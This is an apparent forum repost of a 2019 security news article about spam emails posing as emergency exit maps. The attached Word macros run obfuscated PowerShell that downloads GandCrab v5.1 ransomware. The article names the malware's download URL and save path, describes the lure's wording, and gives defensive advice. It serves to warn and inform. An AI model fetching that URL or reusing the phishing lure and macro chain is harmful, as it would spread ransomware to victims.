Beware of Exit Map Spam Pushing GandCrab v5.1 Ransomware

January 24, 2019

Quote

A new malspam campaign pretending to be the current emergency exit map for the recipient's building is being used to install the GandCrab Ransomware. These spam emails contain malicious Word documents that download and install the infection from a remote computer.

According to Myonlinesecurity.co.uk, who discovered this campaign, a server that was previously distributing the Ursnif banking Trojan has now started pushing GandCrab Ransomware v5.1. BleepingComputer decided to take a look at the spam emails and the files being distributed so that you can see how this campaign works.

As previously stated, this latest malspam campaign is pretending to be updated emergency exit maps for the recipient's building. These emails state that they are coming from Rosie L. Ashton and have a subject of "Up to datе еmеrgеnсy еxit map". Attached to these spam emails is a Word document titled Emergencyexitmap.doc as shown below.

Malspam Email

If the attachment is opened, the user will simply see a document with the text "Emergency exit map" and a prompt to enable content.

Malicious Word Document

If the user clicks on the Enable Content button, the Word macros will execute a PowerShell script that downloads and installs the GandCrab v5.1 Ransomware onto the computer.

Obfuscated Macros

As you can see below, this PowerShell script is obfuscated to make it more difficult to see exactly what is happening.

Obfuscated Word Macros

When defobfuscated, you can see that the macros download a file called putty.exe from http://cameraista.com/olalala/putty.exe and save it to C:\Windows\temp\putty.exe. The putty.exe is then executed.

Deobfuscated PowerShell Script

The putty.exe executable is GandCrab 5.1 and will begin to encrypt the files on your computer. Like earlier variants, GandCrab continues to encrypt files and then append a random extension to their file name.

Encrypted GandCrab 5.1 Files

While encrypting your computer, it will also create ransom notes in every folder that a file has been encrypted. These ransom notes indicate the v5.1 version of GandCrab and provide instructions on how to make a ransom payment.

GandCrab 5.1 Ransom Note

Unfortunately, it is not possible to decrypt files encrypted by GandCrab, but you can still vaccinate a computer so that it will not be encrypted by the malware. To vaccinate your computer, you can download Valthek's GandCrab vaccine from https://29wspy.ru/reversing.html.

As always, never open an attachment you receive via email unless you confirm who it was sent from and that they meant to send it to you. It is also strongly suggested that you scan all attachments using VirusTotal before you open them in order to remain protected from malicious documents.

https://www.bleepingcomputer.com/news/se...ansomware/